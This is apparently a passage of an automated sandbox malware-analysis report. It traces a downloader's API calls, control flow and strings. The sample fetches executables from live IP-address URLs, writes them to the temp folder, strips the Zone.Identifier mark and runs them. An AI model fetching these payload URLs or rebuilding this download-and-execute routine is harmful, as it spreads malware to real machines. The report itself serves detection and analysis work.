                                               • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: 8bd7c183f5dc8e23e07147046c3dcd5cb35c891fe78833b27ee12e71d942ab9e
                                              • Instruction ID: cb44a08c43304d4ce2a2b41a30cd1ac30bb337774ecd58af9c3ef7f30890bab9
                                              • Opcode Fuzzy Hash: 8bd7c183f5dc8e23e07147046c3dcd5cb35c891fe78833b27ee12e71d942ab9e
                                              • Instruction Fuzzy Hash: D301E1B49513589BCB20CFA6DC497DDB7B6AB05705F0080A9A6049B340E6309BC5DF54

                                              Control-flow Graph

                                               control_flow_graph for 006E1150 (rendered interactively in the original report with executed and not-executed blocks colour-coded; the raw edge list is omitted). Basic blocks: 006E1150-006E116A; 006E116C-006E118A call 006E11B0; 006E118F-006E1199 (result check); 006E119B-006E11A3 lstrcpyW; 006E11A9-006E11AF (exit).
                                              APIs
                                                • Part of subcall function 006E11B0: GetDriveTypeW.KERNELBASE(006E118F), ref: 006E11BD
                                              • lstrcpyW.KERNEL32(?,?), ref: 006E11A3
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                               • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: DriveTypelstrcpy
                                              • String ID:
                                              • API String ID: 3664088370-0
                                              • Opcode ID: 295f8a4f5cd99dfe782f6b7f360bb7e8525e8e69804bd909cc57b1364c6a883f
                                              • Instruction ID: a7a8a2d229a4f12f8fe3295ece0abf2ce4776a0d795791e1940fe1691ae0021c
                                              • Opcode Fuzzy Hash: 295f8a4f5cd99dfe782f6b7f360bb7e8525e8e69804bd909cc57b1364c6a883f
                                              • Instruction Fuzzy Hash: 53F04471D00248FBDB00DFA8D845BEDB7B9EF44300F0085A8E8199B340E235AB49DB45

                                              Control-flow Graph

                                              control_flow_graph 129 6e14e0-6e152b memset GetModuleHandleW 130 6e1634 129->130 131 6e1531-6e1550 GetProcAddress 129->131 132 6e1636-6e1639 130->132 131->130 133 6e1556-6e1565 131->133 133->130 135 6e156b-6e1572 133->135 136 6e15d4-6e15db 135->136 137 6e1574-6e157b 135->137 136->130 139 6e15dd-6e1616 memset GetVersionExA 136->139 137->136 138 6e157d-6e15b6 memset GetVersionExA 137->138 138->136 140 6e15b8-6e15c2 138->140 139->130 141 6e1618-6e1622 139->141 144 6e15c4-6e15ce 140->144 145 6e15d0-6e15d2 140->145 142 6e1624-6e162e 141->142 143 6e1630-6e1632 141->143 142->130 142->143 143->132 144->136 144->145 145->132
                                              APIs
                                              • memset.MSVCR90 ref: 006E1501
                                              • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 006E1518
                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 006E153D
                                              • memset.MSVCR90 ref: 006E1595
                                              • GetVersionExA.KERNEL32(0000009C), ref: 006E15AE
                                              • memset.MSVCR90 ref: 006E15F5
                                              • GetVersionExA.KERNEL32(0000009C), ref: 006E160E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: memset$Version$AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 3060919973-1489217083
                                              • Opcode ID: 6ec84185e4a1082cd9168ba93cb2ec2d45d3767970ee28b7ed91b6b949b09546
                                              • Instruction ID: 26fd4156811e5941bfb6b99edd3a5b9cc89748c01effb5410022a9910abf3a0c
                                              • Opcode Fuzzy Hash: 6ec84185e4a1082cd9168ba93cb2ec2d45d3767970ee28b7ed91b6b949b09546
                                              • Instruction Fuzzy Hash: C931CC70C063AC9ADF34CB228C4EBEAB776AB56700F0401D8E1495A2C1D7758F85EF91

                                              Control-flow Graph

                                              control_flow_graph 164 6e1b24-6e1b31 SetUnhandledExceptionFilter
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00001AE2), ref: 006E1B29
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 6cca905fb2452a0d6afedccdf30d06e3a9a9cfdd831748dafe2320687f0cd58c
                                              • Instruction ID: 29ebfe759e107ea68b7a33c68bb276a812d52ac9ef185c5810c20cd728a3f930
                                              • Opcode Fuzzy Hash: 6cca905fb2452a0d6afedccdf30d06e3a9a9cfdd831748dafe2320687f0cd58c
                                              • Instruction Fuzzy Hash: 3690027029339046971017B65D4D61676A75A597167521465A101CD164EA6042447522

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 006E12F9
                                              • srand.MSVCR90 ref: 006E1300
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006E1320
                                              • strlen.MSVCR90 ref: 006E132A
                                              • mbstowcs.MSVCR90 ref: 006E1341
                                              • rand.MSVCR90 ref: 006E1349
                                              • rand.MSVCR90 ref: 006E135D
                                              • wsprintfW.USER32 ref: 006E1384
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 006E139A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 006E13C9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 006E13F8
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 006E142B
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 006E145C
                                              • CloseHandle.KERNEL32(000000FF), ref: 006E146B
                                              • wsprintfW.USER32 ref: 006E1484
                                              • DeleteFileW.KERNEL32(?), ref: 006E1494
                                              • CloseHandle.KERNEL32(000000FF), ref: 006E14B0
                                              • InternetCloseHandle.WININET(00000000), ref: 006E14BD
                                              • InternetCloseHandle.WININET(00000000), ref: 006E14CA
                                              Strings
                                              • %s:Zone.Identifier, xrefs: 006E1478
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 006E1395
                                              • %s\%d%d.exe, xrefs: 006E1378
                                              • %temp%, xrefs: 006E131B
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                              • API String ID: 770025858-111153409
                                              • Opcode ID: 90566ec5a0f69fe08c753128ef857c07176d0b81b01034685179efa87e9098da
                                              • Instruction ID: 3401b3e948bf641a66436dfdeb0bdbf53309647aca7989df88634913ce4096a5
                                              • Opcode Fuzzy Hash: 90566ec5a0f69fe08c753128ef857c07176d0b81b01034685179efa87e9098da
                                              • Instruction Fuzzy Hash: 284169B1942368ABEB20DB50DC4DFE9737BAB88701F0445D8F609AB2D1DA749B84CF54

                                              Control-flow Graph

                                              control_flow_graph 146 6e1000-6e1060 memset * 2 CreateProcessW 147 6e1062-6e106f Sleep 146->147 148 6e1071-6e1095 ShellExecuteW 146->148 149 6e10a8-6e10ab 147->149 150 6e10a6 148->150 151 6e1097-6e10a4 Sleep 148->151 150->149 151->149
                                              APIs
                                              • memset.MSVCR90 ref: 006E100E
                                              • memset.MSVCR90 ref: 006E101E
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 006E1057
                                              • Sleep.KERNEL32(000003E8), ref: 006E1067
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 006E1082
                                              • Sleep.KERNEL32(000003E8), ref: 006E109C
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: 94f5cb1230f3e11a3b904c24e694fa3e1844234ed86705170fb9b77ad2ca80c0
                                              • Instruction ID: 91f5b0c389d8ebd8a154c4962698c8bf7883dc4ba5e1405c7cd79fa2de7338f4
                                              • Opcode Fuzzy Hash: 94f5cb1230f3e11a3b904c24e694fa3e1844234ed86705170fb9b77ad2ca80c0
                                              • Instruction Fuzzy Hash: 70117771E41358BBEB20DF90CC4AFDD7776AB15B01F100119F6086F2C0DAB19A44D755

                                              Callgraph

                                              Control-flow Graph

                                              APIs
                                              • wsprintfW.USER32 ref: 00221015
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0022102B
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00221056
                                              • Sleep.KERNELBASE(000003E8), ref: 00221064
                                              • InternetCloseHandle.WININET(?), ref: 0022106E
                                              • Sleep.KERNELBASE(000003E8), ref: 00221079
                                              • InternetCloseHandle.WININET(00000000), ref: 00221086
                                              Strings
                                              • http://91.202.233.141/PLTRESA, xrefs: 00221009
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00221026
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2489279018.0000000000221000.00000020.00000001.01000000.00000008.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2489256104.0000000000220000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000007.00000002.2489656463.0000000000224000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_220000_524024912.jbxd
                                              Similarity
                                              • API ID: Internet$CloseHandleOpenSleep$wsprintf
                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://91.202.233.141/PLTRESA
                                              • API String ID: 2685051180-2880211933
                                              • Opcode ID: 10e36c117bb3bafa3abfd4a6561f9af5948bc07e8f2b53d5ad8100f541034b35
                                              • Instruction ID: 14d05ec07919e58795e20e1f7234347409afc645aadfc35923e1d8d14815436c
                                              • Opcode Fuzzy Hash: 10e36c117bb3bafa3abfd4a6561f9af5948bc07e8f2b53d5ad8100f541034b35
                                              • Instruction Fuzzy Hash: E8017C74E80316FBD7359FE4ED0EF697678EB18701F101198BA09A61C0CAB12B59CA69

                                              Control-flow Graph

                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 002210AA
                                              • wsprintfW.USER32 ref: 002210C3
                                              • PathFileExistsW.KERNELBASE(?), ref: 002210D3
                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 002210F9
                                              • CloseHandle.KERNELBASE(000000FF), ref: 00221115
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2489279018.0000000000221000.00000020.00000001.01000000.00000008.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2489256104.0000000000220000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000007.00000002.2489656463.0000000000224000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_220000_524024912.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                              • String ID: %s\85858737373d.txt$%temp%
                                              • API String ID: 750032643-1651764242
                                              • Opcode ID: 815fd53a2c43b742d056211bc09f2f053e9189d539b851d971aaf4bdc812b720
                                              • Instruction ID: 52208627266347b7cbcffdc1fcc6c056c3d7ed11bbd8dd79ddf145fd318bda08
                                              • Opcode Fuzzy Hash: 815fd53a2c43b742d056211bc09f2f053e9189d539b851d971aaf4bdc812b720
                                              • Instruction Fuzzy Hash: A10184B055032CFBDB309BA0AC4EFE57378AB54700F404694A719960D1E6B25BAACFA5

                                              Control-flow Graph

                                              control_flow_graph 9 221130-221148 Sleep call 221090 12 22114a call 221000 9->12 13 22114f-221152 9->13 12->13
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00221138
                                                • Part of subcall function 00221090: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 002210AA
                                                • Part of subcall function 00221090: wsprintfW.USER32 ref: 002210C3
                                                • Part of subcall function 00221090: PathFileExistsW.KERNELBASE(?), ref: 002210D3
                                                • Part of subcall function 00221000: wsprintfW.USER32 ref: 00221015
                                                • Part of subcall function 00221000: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0022102B
                                                • Part of subcall function 00221000: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00221056
                                                • Part of subcall function 00221000: Sleep.KERNELBASE(000003E8), ref: 00221064
                                                • Part of subcall function 00221000: InternetCloseHandle.WININET(?), ref: 0022106E
                                                • Part of subcall function 00221000: Sleep.KERNELBASE(000003E8), ref: 00221079
                                                • Part of subcall function 00221000: InternetCloseHandle.WININET(00000000), ref: 00221086
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2489279018.0000000000221000.00000020.00000001.01000000.00000008.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2489256104.0000000000220000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000007.00000002.2489656463.0000000000224000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_220000_524024912.jbxd
                                              Similarity
                                              • API ID: Internet$Sleep$CloseHandleOpenwsprintf$EnvironmentExistsExpandFilePathStrings
                                              • String ID:
                                              • API String ID: 344363592-0
                                              • Opcode ID: 6be1613f5ca6b5ab8af86f57000dd05c1324b0b8b70ce32bfc0ed13ad1745640
                                              • Instruction ID: c88b8584859c40f1c219df0f8b633cb81fd250036788b614f705b71aed381ba1
                                              • Opcode Fuzzy Hash: 6be1613f5ca6b5ab8af86f57000dd05c1324b0b8b70ce32bfc0ed13ad1745640
                                              • Instruction Fuzzy Hash: 0DC08C3112426A32911032F27C0BF36329C4B30BA2F401423B908C4086DD82D57598B1

                                              Callgraph

                                              Control-flow Graph

                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00A310CA
                                              • wsprintfW.USER32 ref: 00A310E3
                                              • PathFileExistsW.KERNELBASE(?), ref: 00A310F3
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00A31119
                                              • CloseHandle.KERNEL32(000000FF), ref: 00A31135
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                              • String ID: %s\afaefefaeff.txt$%temp%
                                              • API String ID: 750032643-3182922545
                                              • Opcode ID: 2bb45e398fe450a1a09e43dcc26897d8d81f46c516796b04917ff134c79b2073
                                              • Instruction ID: 5c37779793f12fda13433c8b08791bf5752a99d566e8ad1295e555dc83bd8fe1
                                              • Opcode Fuzzy Hash: 2bb45e398fe450a1a09e43dcc26897d8d81f46c516796b04917ff134c79b2073
                                              • Instruction Fuzzy Hash: EE01A2B1944318BBDF20DBA09C4EFE67338AB44701F408798B715A20D1DBB49BC68FA4

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00A316AE
                                                • Part of subcall function 00A310B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00A310CA
                                                • Part of subcall function 00A310B0: wsprintfW.USER32 ref: 00A310E3
                                                • Part of subcall function 00A310B0: PathFileExistsW.KERNELBASE(?), ref: 00A310F3
                                                • Part of subcall function 00A31230: GetLogicalDrives.KERNEL32 ref: 00A31236
                                                • Part of subcall function 00A31230: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00A31284
                                                • Part of subcall function 00A31230: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00A312B1
                                                • Part of subcall function 00A31230: RegCloseKey.ADVAPI32(?), ref: 00A312CE
                                              • wsprintfA.USER32 ref: 00A31755
                                              • strcmp.MSVCR90 ref: 00A3176A
                                                • Part of subcall function 00A31150: lstrcpyW.KERNEL32(?,?), ref: 00A311A3
                                              Strings
                                              • http://91.202.233.141/lksrv.exe, xrefs: 00A3178F
                                              • http://91.202.233.141/lkdrv.exe, xrefs: 00A31776
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: wsprintf$CloseDrivesEnvironmentExistsExpandFileLogicalOpenPathQuerySleepStringsValuelstrcpystrcmp
                                              • String ID: http://91.202.233.141/lkdrv.exe$http://91.202.233.141/lksrv.exe
                                              • API String ID: 357889991-2508253401
                                              • Opcode ID: 0d273ac004c00914fe05ed54678a8cdb4758d1a0ff2002c2ae55c4392dc1fe6e
                                              • Instruction ID: b7a307c660ba4239557350290bf6b46225e2a4b135d8d3b90c2d320efa942fa4
                                              • Opcode Fuzzy Hash: 0d273ac004c00914fe05ed54678a8cdb4758d1a0ff2002c2ae55c4392dc1fe6e
                                              • Instruction Fuzzy Hash: 1421D7B5D04318AFCB50EB94DD4BBAA7374AF04304F1441E9F51996243EB709B848FA1

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00A312F9
                                              • srand.MSVCR90 ref: 00A31300
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00A31320
                                              • strlen.MSVCR90 ref: 00A3132A
                                              • mbstowcs.MSVCR90 ref: 00A31341
                                              • rand.MSVCR90 ref: 00A31349
                                              • rand.MSVCR90 ref: 00A3135D
                                              • wsprintfW.USER32 ref: 00A31384
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00A3139A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00A313C9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00A313F8
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 00A3142B
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 00A3145C
                                              • CloseHandle.KERNEL32(000000FF), ref: 00A3146B
                                              • wsprintfW.USER32 ref: 00A31484
                                              • DeleteFileW.KERNEL32(?), ref: 00A31494
                                              • CloseHandle.KERNEL32(000000FF), ref: 00A314B0
                                              • InternetCloseHandle.WININET(00000000), ref: 00A314BD
                                              • InternetCloseHandle.WININET(00000000), ref: 00A314CA
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 00A31395
                                              • %s:Zone.Identifier, xrefs: 00A31478
                                              • %temp%, xrefs: 00A3131B
                                              • %s\%d%d.exe, xrefs: 00A31378
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                              • API String ID: 770025858-111153409
                                              • Opcode ID: a6566e6feff58b74d19a5ad4e6ed0cda65bba7562e282250e9eebac085d38d84
                                              • Instruction ID: 606355659ac5d1cf3bc1f463086d4211763c3a804513bd47d6218457a6e7452b
                                              • Opcode Fuzzy Hash: a6566e6feff58b74d19a5ad4e6ed0cda65bba7562e282250e9eebac085d38d84
                                              • Instruction Fuzzy Hash: F941B5B2905318ABEF24DBA0DD4AFEA7379BB88711F0445D8F609A21C1DB749B85CF50

                                              Control-flow Graph

                                              control_flow_graph 93 a314e0-a3152b memset GetModuleHandleW 94 a31531-a31550 GetProcAddress 93->94 95 a31634 93->95 94->95 97 a31556-a31565 94->97 96 a31636-a31639 95->96 97->95 99 a3156b-a31572 97->99 100 a315d4-a315db 99->100 101 a31574-a3157b 99->101 100->95 102 a315dd-a31616 memset GetVersionExA 100->102 101->100 103 a3157d-a315b6 memset GetVersionExA 101->103 102->95 104 a31618-a31622 102->104 103->100 105 a315b8-a315c2 103->105 108 a31630-a31632 104->108 109 a31624-a3162e 104->109 106 a315d0-a315d2 105->106 107 a315c4-a315ce 105->107 106->96 107->100 107->106 108->96 109->95 109->108
                                              APIs
                                              • memset.MSVCR90 ref: 00A31501
                                              • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00A31518
                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00A3153D
                                              • memset.MSVCR90 ref: 00A31595
                                              • GetVersionExA.KERNEL32(0000009C), ref: 00A315AE
                                              • memset.MSVCR90 ref: 00A315F5
                                              • GetVersionExA.KERNEL32(0000009C), ref: 00A3160E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: memset$Version$AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 3060919973-1489217083
                                              • Opcode ID: 590455813328a8c81d82bad444eb077523b07623ae9caec49c181326b4025aa7
                                              • Instruction ID: 91f9e676a21cb70aae161f8312d8fb26985e8ab822d6c9f5c0c0ea04ce3b08f2
                                              • Opcode Fuzzy Hash: 590455813328a8c81d82bad444eb077523b07623ae9caec49c181326b4025aa7
                                              • Instruction Fuzzy Hash: B7318071C4536C9BDF39CB618C4ABEAB774AB15701F0449D8F109A5190D7758F84CF91

                                              Control-flow Graph

                                              control_flow_graph 110 a31000-a31060 memset * 2 CreateProcessW 111 a31062-a3106f Sleep 110->111 112 a31071-a31095 ShellExecuteW 110->112 113 a310a8-a310ab 111->113 114 a31097-a310a4 Sleep 112->114 115 a310a6 112->115 114->113 115->113
                                              APIs
                                              • memset.MSVCR90 ref: 00A3100E
                                              • memset.MSVCR90 ref: 00A3101E
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00A31057
                                              • Sleep.KERNEL32(000003E8), ref: 00A31067
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00A31082
                                              • Sleep.KERNEL32(000003E8), ref: 00A3109C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
